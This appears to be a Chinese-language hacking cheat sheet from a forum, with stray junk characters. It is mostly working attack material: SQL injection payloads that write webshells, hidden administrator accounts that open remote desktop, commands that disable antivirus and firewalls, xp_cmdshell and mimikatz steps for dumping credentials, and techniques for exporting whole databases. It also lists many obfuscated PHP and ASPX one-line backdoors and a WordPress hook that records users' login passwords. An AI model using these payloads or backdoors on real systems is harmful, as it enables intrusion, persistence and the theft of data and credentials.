- u& A1 ]. H$ r( J, w" m查询sql server 2005中的密码hash. j7 W' h! A" \* }$ J& g( i. D
SELECT password_hash FROM sys.sql_logins where name='sa'" Q' N" w+ x) S# c
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
/ A0 s8 K7 G- U: {0 jaccess中导出shell
  u) N( P- }* h
, z9 J, a! Z. }: K% Y中文版本操作系统中针对mysql添加用户完整代码:# h1 ^' v0 o9 @

0 R$ a3 d8 N* ?use test;
  _* h: A( _- G$ ^) x7 x: N& {$ b( rcreate table a (cmd text);
& g6 `" `* i) r' Xinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
  z7 q( e( H* ^' H  G5 s3 `insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 Q% y, T/ F- b. `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 {" }4 N2 q" h3 r- F
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";5 Q  j# _  Y: `: U6 b& e
drop table a;
$ T4 Y  q1 s: t+ _! ~! `- J% K
6 z/ f( v; v5 p7 F4 b7 b7 b  ^英文版本:) h: G" y; F( `2 _" \/ T
0 g4 P& e  u( k7 n
use test;) `: b9 i& }1 u% C+ r1 H
create table a (cmd text);
3 j* K) o! r" d, A; n) {: ?6 }insert into a values ("set wshshell=createobject (""wscript.shell"") " );
& ^' C* ?/ f& P& Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );1 x0 y* O2 @# Y/ P  V/ h) C$ e
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 I* ]# a$ p) K4 M" S- O; r
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 p/ Q+ i* i4 ?4 Q9 \5 @; p, r
drop table a;* V9 K# Q( k" P4 d" C

4 t" F6 m. P* U' ~" dcreate table a (cmd BLOB);+ Z; t9 e6 p' M* f
insert into a values (CONVERT(木马的16进制代码,CHAR));' S7 G: f8 |" t, A4 Y$ U
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'6 e) V! j. G8 }9 A
drop table a;9 f* Y. n' @& f9 [& C( i- \
" I. ?& H: k- K/ G6 f) N, m6 ?
记录一下怎么处理变态诺顿. \/ [, z) [: C0 }3 A# x3 u
查看诺顿服务的路径
. S/ \! @9 e# n. C6 k! Tsc qc ccSetMgr
* J- d8 r' q  O* a* |然后设置权限拒绝访问。做绝一点。。
0 C3 A6 {, U4 q1 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
1 r5 ~; m8 U" W( d3 E, J& [* mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
- v$ l8 k5 x! [/ C: @" gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& `# k- r0 _" n' a/ O: F. T0 Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
8 p: R5 E2 G* b7 g! s: j' x9 p8 t: R; k
然后再重启服务器
: q2 p$ i, j: @$ Qiisreset /reboot
0 U& f  e, l! v$ @6 }这样就搞定了。。不过完事后。记得恢复权限。。。。. b% ~+ \- t' V. E4 m1 A
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
- @) \( t5 o, j* \$ N! g7 S; N# Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F/ ]3 d" C5 r; e1 t* e' k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
( M. R+ f( C8 V6 A% Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F- w# [! {# ^2 X* Q5 L9 ^/ L
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 o! M7 B0 v! c6 P
; W6 B, Z3 ]# _, J& X7 d; e' e
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
  y. b$ G/ v2 S! h( x; q/ v% {3 s  h7 a7 r9 Y/ x0 M- ^9 b& t4 I
postgresql注射的一些东西
+ V1 Y4 N+ t2 V1 F; `( E如何获得webshell5 e( v( b8 w1 a. H8 q' x$ r
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - A/ k. j7 Q  t+ H, I$ U
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : O7 y& l* B* L, F
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;8 Q8 ^' @6 P) c7 u. x0 N
如何读文件
: I" K/ I6 Q+ [2 J( p6 v# u# Z- z! T7 {) ]http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
7 r/ s3 D3 u- Y- _http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
- F! Y- |- F. S( c  ^http://127.0.0.1/postgresql.php?id=1;select * from myfile;' S% [4 F) t5 H, }" N

& R! g: p& a0 mz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! k  a+ L( D; t
当然,这些的postgresql的数据库版本必须大于8.X( q' L) S+ p+ M2 H
创建一个system的函数:8 T: E- Q2 J3 u- l2 i
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT) U$ `7 k5 U) o- v2 ?4 I0 }

, [- A$ G1 Y8 ^' b# |4 ^创建一个输出表:
/ s% W" A8 p5 I6 R( Q  n" PCREATE TABLE stdout(id serial, system_out text)! x; R' ?, Q  @3 M& q
: w% D4 ]- ~* X
执行shell,输出到输出表内:
3 D2 E* q8 i0 M5 V: ySELECT system('uname -a > /tmp/test')6 Z& B5 U  z) x/ w) l* V: d! M8 z2 A

; e9 ]/ w) @! V4 P. J$ D, pcopy 输出的内容到表里面;
, K: D* m0 k7 N1 ?COPY stdout(system_out) FROM '/tmp/test'# E3 ~4 s: s3 R, Y* P

- L' G% I. [. F7 g从输出表内读取执行后的回显,判断是否执行成功' c+ `5 Y# @* h3 M
+ p# Q! U9 t6 L3 W& J3 Y
SELECT system_out FROM stdout
8 n/ p. _% [  P- e% L- ^5 \下面是测试例子
: X8 d- V3 m, q. _
0 ~# H$ j5 q. u  ^+ u) w/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
4 R: B. }& w2 k; H( Z0 X3 I4 \( |5 R- `5 ~
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' |' f- I! }: J# ?- N# T
STRICT --: ^  U# b& D+ g8 y3 D. s

: X- @1 w, X! d/store.php?id=1; SELECT system('uname -a > /tmp/test') --
# D' [; J3 ~! R) a! |% ~
# w& C9 v, j5 l  j/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --& w  }9 ~% V5 {: o7 b
. s# u& D5 B. e
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
; u$ d: s6 I8 A3 Lnet stop sharedaccess    stop the default firewall; I2 \4 `' U2 R0 a% W( s
netsh firewall show      show/config default firewall
, K# D' D3 j$ ?5 [4 y% K+ unetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
* N3 v  _  a- E4 T( anetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
  f' V8 }" j- o  p* t3 a修改3389端口方法(修改后不易被扫出)
& L: o2 A6 e- h% S) ~" I; [修改服务器端的端口设置,注册表有2个地方需要修改. O" O: B. }: D8 \0 T( E9 M
# C- s) Y8 J/ J7 |$ y9 n
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
* \+ h$ G0 c2 Y$ r9 dPortNumber值,默认是3389,修改成所希望的端口,比如6000
; A: y* \6 D3 ~" `6 h' q* I- x% ^, E/ H- Z
第二个地方:( y, b" z8 P0 ^4 c
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
2 Q' n( V( N3 }7 i3 \5 H- OPortNumber值,默认是3389,修改成所希望的端口,比如6000( |. t4 w  F  e9 _3 F4 E

) J0 p/ J; ]9 K. W4 x/ J现在这样就可以了。重启系统就可以了
0 ?: B4 S& Z- ?# B; y! p  x& G
查看3389远程登录的脚本
0 \2 l- w6 t( c) F8 M; G保存为一个bat文件
9 {& b8 O9 j" S0 x3 \date /t >>D:\sec\TSlog\ts.log
2 Z. w& V0 _% M7 a* A: v# D, w; ztime /t >>D:\sec\TSlog\ts.log4 b- c# C" q  ^+ z- M
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# ~) `( u' y; h3 }0 l
start Explorer/ L% U! q6 ]/ ^. j* {  k8 C7 R

( R9 @' }" u; V, mmstsc的参数:3 H% c( ^1 O  i# t. O" G- z2 }
7 s; G5 r! i8 w# D
远程桌面连接
# I: o" W) `  x: ?9 E1 o% v
. f: X; o* i4 g$ SMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
; W3 O, u5 \- t2 y% s% B  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?6 B& \9 M8 ]; h8 n; q+ e% E; P
. d1 ?0 v8 W! h% u/ [9 w
<Connection File> -- 指定连接的 .rdp 文件的名称。
! s6 h! T; {8 `
4 r: w- d! P& X+ _% |8 Z! z- a7 j/v:<server[:port]> -- 指定要连接到的终端服务器。; n0 Y& s5 n0 S
. ]% G: A. k$ w6 o* \0 ?
/console -- 连接到服务器的控制台会话。
: M$ i+ D: C2 q0 ~1 A  G9 q1 z/ C1 \2 i
/f -- 以全屏模式启动客户端。+ }5 T! s) z$ I/ ^. m

; j6 k1 I. L0 {( @) J# \/w:<width> --  指定远程桌面屏幕的宽度。- C+ K& A1 A( F8 Y; f; }
  W' j& }4 h0 o' [# b1 G9 m
/h:<height> -- 指定远程桌面屏幕的高度。5 ~% \& ~) V. @  |$ I) `; [3 X
  ?+ Z! W' K  _
/edit -- 打开指定的 .rdp 文件来编辑。
+ v( y& e# ^" c) M4 k) p
7 C5 r2 F6 [& `( E2 @# Z/migrate -- 将客户端连接管理器创建的旧版
- V  V. m. u- {4 z7 c2 Z  y/ {连接文件迁移到新的 .rdp 连接文件。7 C. X0 r- {% J4 g( P
( _2 H8 E: _" O
8 ~+ d+ L  n2 e. \4 F
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
/ b, H0 g& A8 _  |7 smstsc /console /v:124.42.126.xxx 突破终端访问限制数量
4 a1 ]7 I$ V5 V. S- G. G5 Q" j; e7 S# D
命令行下开启3389* z7 `" q' I! Z) q) S
net user asp.net aspnet /add
8 t3 M! _1 a2 z" t1 x% C) B6 x. F/ ?net localgroup Administrators asp.net /add% F) }7 p3 }* o1 s
net localgroup "Remote Desktop Users" asp.net /add3 l" z) n! {; k+ G; E
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D5 b& s% N- |! k; W) A5 u; l8 i
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
: D% L, L, Q) X( \$ N; Kecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 10 d1 Y1 t. \& Y- D4 L
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f% a* [, O; A/ p* ~  b8 Q! U5 h6 C
sc config rasman start= auto
& Y. ]6 X  ~. ~0 P7 Zsc config remoteaccess start= auto  \, z$ Y+ r( c, b2 i
net start rasman+ d2 e- [& s8 S5 Q" |- A
net start remoteaccess) o! g* {  z0 K: A$ v  i
Media5 z0 q3 K! X& Z+ j- W+ j. O
<form id="frmUpload" enctype="multipart/form-data"
# @: \* M" ^+ uaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
0 e, L8 [4 \/ x4 x# ~7 z<input type="file" name="NewFile" size="50"><br>1 p4 D0 k: I0 R
<input id="btnUpload" type="submit" value="Upload">
. h! B$ N2 i9 F; F0 l- O9 U6 _# Y</form>2 d3 T& k  w" [) y4 d* {' z

9 F' S7 u( ^8 ~9 B7 W# d7 econtrol userpasswords2 查看用户的密码' K. [* S2 W' }0 F9 p
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
. P  p" e* a; g* Y0 pSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a( s& N+ Y3 [( o: F+ {

: M# o7 ~5 y  n" H4 f141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:' p( @2 S- N0 v9 y! y0 s
测试1:
! r; x+ t9 u6 c$ F) i  dSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
0 {' }3 ^9 B# W
& ?* a: B* C+ Z7 C/ [测试2:( V9 @! e6 A: c5 O6 f
+ P, [* ?% l$ o. Q
create table dirs(paths varchar(100),paths1 varchar(100), id int)4 R" A, u; R2 \2 t+ v1 [

5 t1 I3 X/ h3 S- O# ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
' s9 M+ W6 C# y: m7 p( p, l5 `! d+ C. M( b% f  j. x
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t12 e; {4 m- _! [7 ~3 @
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令3 k( \; _! n& |# e4 N% N  ^: Y- }- s
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;, M3 |3 D! i. {# f  u4 d- l7 B
net stop mcafeeframework
% y8 b2 E  C7 Q! Z& knet stop mcshield
% }! y$ y8 o4 u: ]0 y4 q  l, F" \0 {net stop mcafeeengineservice' a" K* d" _4 m
net stop mctaskmanager  P- V' ]9 b$ b2 d5 P- J
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
8 Y' ]7 @8 ^0 I+ K6 E( N
( v. `* H5 U8 \  VNCDump.zip (4.76 KB, 下载次数: 1)
: }% g8 b1 f: @密码在线破解http://tools88.com/safe/vnc.php
; v7 o+ y, Q8 GVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
; Z/ J  F- `; G$ U+ `) G, q4 o) O6 \8 E
exec master..xp_cmdshell 'net user'  B5 f% l# R; i' f/ s
mssql执行命令。
4 R$ e: N' z: m1 w# M! ?. x! b获取mssql的密码hash查询
/ Q& p5 O1 \% P8 P# @8 vselect name,password from master.dbo.sysxlogins
- ^0 u) L; R7 n$ m8 t* k' D4 C# H
" A) o, S0 r4 C: g' o6 gbackup log dbName with NO_LOG;/ [: ~, e1 c6 h/ d; l
backup log dbName with TRUNCATE_ONLY;6 g. q8 _* B, C+ l) |
DBCC SHRINKDATABASE(dbName);' s. K- a9 h3 r, t. u5 ~
mssql数据库压缩
; q* L: f$ E9 _5 v  r& V- [7 [# ~" a8 p$ W  T" X# Z
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
8 j7 U! K+ s' x& f" w* g将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
. k1 Q/ x- U7 w5 G* p5 E4 n6 i0 i1 ^  c
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
; E8 p$ y. D/ Z/ a' q备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak# I) ^0 i& Q% W4 e7 ~
* p& L9 G, H* Z( I
Discuz!nt35渗透要点:# @1 l- v1 {1 }; F# v3 i) Q
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 V1 l2 V9 {% J% k! m$ V(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
* d3 y, u+ q+ g(3)保存。
4 t/ d% m1 ^* J$ q2 B8 J* o(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass( c- ^1 K7 C7 `' r
d:\rar.exe a -r d:\1.rar d:\website\6 K9 n" b4 s- }- t
递归压缩website
$ P, i: n' P% e* J- R0 p* S注意rar.exe的路径
/ p3 ?2 S% N8 }, C
& X5 F; k+ E6 j1 S' K, O6 s( U<?php/ E6 r7 b" e4 e

9 o' X1 e' f3 v# E" N1 ~9 M$telok   = "0${@eval($_POST[xxoo])}";
. _: K$ Q6 ~8 y/ d5 X6 q# f+ A2 c/ h
0 ]/ |+ `8 v7 `% M$username   = "123456";/ }7 }. r8 `; ]( G# Z
( {) g+ B0 g  Z) j7 f5 `9 Q- ~' W3 h
$userpwd   = "123456";
/ j6 a* e6 |$ t7 z0 N
) a+ v, ?% R% h% @; _, e- m" Y$telhao   = "123456";
/ }6 C0 S9 r1 G: o$ `7 @3 U/ {9 @* _+ Z. N5 U8 \
$telinfo   = "123456";
2 V$ j3 ^" g7 L* z4 W7 K5 s" p
$ h4 d# h5 O" g- K7 H?>
# n/ E: D  T! R/ q7 dphp一句话未过滤插入一句话木马
9 {# X9 a: z$ o* F5 R3 b$ ]! X1 [  Z, H$ Y
站库分离脱裤技巧4 z/ _" c7 d; w; |
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
& r! g' y) v* T6 p2 l* h/ xexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
) W4 E: n3 O0 \条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
! v+ U  B/ E% W& }: A这儿利用的是马儿的专家模式(自己写代码)。
  S8 f1 x5 ~4 U7 hini_set('display_errors', 1);4 @( Q6 m# O: M( Z0 \. @
set_time_limit(0);
  M( @. m4 V# v1 c; W9 Z0 ~error_reporting(E_ALL);
) O/ O, V/ N  S6 e# n$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
2 D" c0 F4 B% H) _: Bmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
, d) b- y" y) q6 p; s! |$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());' s% h& r- R% w# h2 j1 Y( `" t
$i = 0;
  z' Q; G. B3 i0 }9 y0 H$tmp = '';
- ^' \% z; L8 |. M9 s) Rwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {) m3 Q2 y6 d4 S2 V- x7 A7 C! h
    $i = $i+1;
) T5 z6 U: R! n  d* z    $tmp .=  implode("::", $row)."\n";7 n+ a  M. @' O  q, O+ t& B
    if(!($i%500)){//500条写入一个文件( C5 m7 }# Z. C# l$ o/ c
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
$ \1 M1 ]4 o" h        file_put_contents($filename,$tmp);
9 f0 _$ l& F& e; |        $tmp = '';
, m6 Y4 D# y+ R, I& K+ h    }
2 x; `( d$ o: n, K  D8 C}; l: l; W2 _% u. @& V; g  A/ T+ f
mysql_free_result($result);
5 L- l! {7 ]: C0 h) N% S( P) w2 a6 r& G/ T3 v; Q2 F

: ~$ W$ F; l& `! J( p% ]2 k
9 K% z6 ?; [, i- I7 ^5 C& d//down完后delete
% G4 g% I) M- ~, n, G2 Q0 ?5 R) n, h  A
" D0 S) ]/ W% @, L
ini_set('display_errors', 1);# Y. K/ L! i" b4 p- T* Y
error_reporting(E_ALL);
3 O; z* e6 r5 J$i = 0;
% @2 G+ Z# W  N0 O$ D* kwhile($i<32) {
/ P+ d& J( z9 \0 F' p; p6 S* \    $i = $i+1;* C5 B. \; h! U0 ^3 w% M
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';, m( A8 B% S" f/ p; G
        unlink($filename);
) t0 f* k: M) A4 G+ a" t* u} 2 V( g/ Y9 ~2 i) W6 G7 B( D) B
httprint 收集操作系统指纹
" t/ j, z' |+ Y. G  A1 U扫描192.168.1.100的所有端口6 D1 t2 I: _, ~
nmap –PN –sT –sV –p0-65535 192.168.1.100, t+ ?- u& U: h; }, S
host -t ns www.owasp.org 识别的名称服务器,获取dns信息  L/ l) Z' Q2 p+ T, F% g
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输& N6 g1 M' z  a: y
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
* a# n6 H8 O, C- F
. [6 g. {. k7 ?- E: `% DDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)1 H+ A2 F* d3 u6 c" K3 Y: k. N: }  k
' N& ?0 o" x1 W& C8 ~  F) p
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)) Y+ o7 P1 y9 l( p; o* W

  R, S0 T2 Q1 _  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x5 ]: B- ]  w8 G" T  e
1 E5 m7 p) I! L+ i' C
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
' {% U" A% C' V5 s% H8 }
. `! l7 w2 j+ ^4 y' f* V  http://net-square.com/msnpawn/index.shtml (要求安装)' `/ F2 e; j( r/ e9 ?$ ?

8 _) C. H! o- o9 T  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)' v  P+ w: x5 A0 z/ ^& S8 R

% c& [0 b5 I5 z2 I  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找): e5 d% M3 W  b. U& @7 `0 O  P
set names gb2312) r1 t. v. M% J( a- I
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。$ E0 V9 `$ d! {, G3 w$ _; U

4 I# C9 Y: C3 f  Dmysql 密码修改
/ v" [& ], B6 ^' {5 z1 J4 B8 P0 `1 pUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” & e- ^& u" ^* O; {- `* U
update user set password=PASSWORD('antian365.com') where user='root';4 Z' f1 }: ?$ b. e5 H! H& M7 N
flush privileges;
3 `- B4 k; H% t" F3 p* V高级的PHP一句话木马后门) g4 W9 G0 x: o. F' \
$ a9 {8 F5 k+ E3 q+ [
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀' X# @4 J$ B2 Y9 U/ H( N3 k! ]5 g2 D

- H3 e' G( M' p+ o, R1、/ O! m5 L' j5 ~4 A- t4 o
6 s/ b; S9 m' Z0 Z. J+ N
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ ?  ~& i1 Z) X$ Y
; G, P$ I* f2 ~' `" D
$hh("/[discuz]/e",$_POST['h'],"Access");
+ l6 k8 R$ h/ G$ c2 I$ j' c9 R$ _
4 a' R$ Q1 d$ d) v3 ~5 u) W; V/ l//菜刀一句话
- t: }8 g" |% u" g$ z8 v' P
; m) N2 C/ h( m9 q) q4 i2、
, U/ K5 k. C5 w0 {$ T+ K, }) @! r
' j) A9 Q, l1 d+ _; t  V3 g6 X$filename=$_GET['xbid'];
: M1 w2 k: y! `7 J: N6 x3 k
3 z" |7 F* o* e# [9 Tinclude ($filename);7 `; J# p' B1 A6 F: o% w7 @
) Y: ^1 _& v/ I: X1 D8 \
//危险的include函数,直接编译任何文件为php格式运行% Y, Y1 L7 g$ s9 s, D" d

* R. s2 x  D& B+ o! ]3、# l( R+ n2 _# ?- M
7 z' c2 o5 Q! \" m' P
$reg="c"."o"."p"."y";+ F+ q: t, b' R2 ?$ l
* J, {- ]& _( I1 X4 G6 y; G, O, f
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);# m8 N+ t% P4 h$ K5 [; R* i+ N

& R. M4 c4 V+ N//重命名任何文件
# X) r" G( e% ~7 o& o- @! ~0 U7 {- q& ?  j0 y+ R
4、1 G  F3 d' v  W4 u

4 f3 Z! B4 R+ r, h. q9 t' U$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
7 p8 T: c2 B0 u/ Z, L0 z# I  F( ]/ ^' |3 Y& v" m$ {0 s# Z5 O
$gzid("/[discuz]/e",$_POST['h'],"Access");0 W& n9 A7 _! f
. L7 y% H+ B% r* z4 `) t/ S! G
//菜刀一句话
2 g1 j1 q8 f  t. \; q/ n1 [8 y, Q' Z7 d; U* x
5、include ($uid);# I8 P- w9 Q: Y+ t
, e7 l6 V" M' C8 d& e% ~" `; E
//危险的include函数,直接编译任何文件为php格式运行,POST # q/ m+ Q2 a; ~5 w- s

/ e& m9 |* a7 {5 u  U' S  V
9 E. k+ y' J  o: s$ X//gif插一句话
# t4 O, \3 w+ a0 D0 A7 m
; D7 N1 L" q; g& V- H8 ^- l6、典型一句话6 P: q6 f" f; Q' m! K
$ F/ K" h( u/ V- y' b6 D
程序后门代码
: B! ?# h; T6 j" }$ n<?php eval_r($_POST[sb])?>
8 [/ B# Z) A( a+ C2 E程序代码3 M+ _) ^7 S7 ~) k; t
<?php @eval_r($_POST[sb])?>
  w! }; U  H) {' e, P  ]//容错代码6 S6 K3 V$ C7 N1 q
程序代码
* E9 Y+ e, x, p/ N) d<?php assert($_POST[sb]);?>
  D% t9 j4 {. d+ Q//使用lanker一句话客户端的专家模式执行相关的php语句# H6 ]) a, F& M" B( e
程序代码! Q. p- ^0 U! k0 |3 F7 z- M# s3 [
<?$_POST['sa']($_POST['sb']);?>$ j8 g+ c. F$ D6 n
程序代码+ H8 ?" t5 |: d6 O4 c
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
! }+ c1 d7 r0 d. e- @程序代码9 B$ z/ |  p$ o
<?php
+ r# |" n# C( p1 F+ p( V" v: \@preg_replace("/[email]/e",$_POST['h'],"error");
" u" _% @( Q. S2 w* _?>. `0 y3 U# k! C6 T3 K
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入2 M/ S9 n" F' M5 c. a) _# \
程序代码5 f8 E  T! N9 B9 c9 _7 U0 e
<O>h=@eval_r($_POST[c]);</O>2 X, y$ e% `$ W0 r) C. \2 d; }
程序代码, n3 z# Z& P& }  ^
<script language="php">@eval_r($_POST[sb])</script>
0 l# [/ z0 `, S# K: j//绕过<?限制的一句话
% p8 J# @; |4 h' Q4 v* d* h+ C# `5 E  {8 y  K) }, f
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip$ e" N. a5 V: y: c5 z
详细用法:! p* p7 @: f  K" f$ j
1、到tools目录。psexec \\127.0.0.1 cmd
5 U9 S* ~) X& P1 _3 y. ^8 N- M! T2、执行mimikatz3 e; g: t/ X1 s( t3 |, f
3、执行 privilege::debug
5 S7 s; U2 m% G. Z4、执行 inject::process lsass.exe sekurlsa.dll
/ H9 t! H# b) `: S5 g- K  @0 s$ z6 [2 C0 e5、执行@getLogonPasswords
, Z! t" g2 ~, q2 Q6、widget就是密码
/ D& P* o# S0 A( C3 j  n1 m7、exit退出,不要直接关闭否则系统会崩溃。
+ }4 x. V: B& ^+ q4 E9 K0 M) J% b- k' O! g$ }
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: s( d" ?  Q% b- e" [" L+ T
! L: t0 g( l+ l4 o# w自动查找系统高危补丁" i* w3 O" K% e- G: ]
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt& w# Y+ d; T# A4 T
5 ]* C: b9 \8 k; F3 ?
突破安全狗的一句话aspx后门7 d& S4 b0 E1 @( F! H" [7 F
<%@ Page Language="C#" ValidateRequest="false" %>2 ^' I4 I* w' D
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
2 H# K1 h2 d, e% H2 uwebshell下记录WordPress登陆密码
7 J' Y- ~) m" r4 cwebshell下记录Wordpress登陆密码方便进一步社工0 w, D# S4 k4 E: n) V9 q! I
在文件wp-login.php中539行处添加:
0 C" a6 \- K; }// log password
  Q' I, d/ M5 W$log_user=$_POST['log'];
& [$ {, C, F- i& g3 i0 A$log_pwd=$_POST['pwd'];
- ^, g; n2 S: G! e3 m5 |$log_ip=$_SERVER["REMOTE_ADDR"];: B* H7 Z, J1 A/ U5 h) a$ R
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; }- ~( E* i' g! @# g$txt=$txt.”\r\n”;
- p( y& O5 v" N! Xif($log_user&&$log_pwd&&$log_ip){
# [5 y5 n6 _& V- N- R3 [@fwrite(fopen(‘pwd.txt’,”a+”),$txt);: ]3 L- I% n5 k9 J4 @. {
}! A5 [# U# {: p6 Y5 g
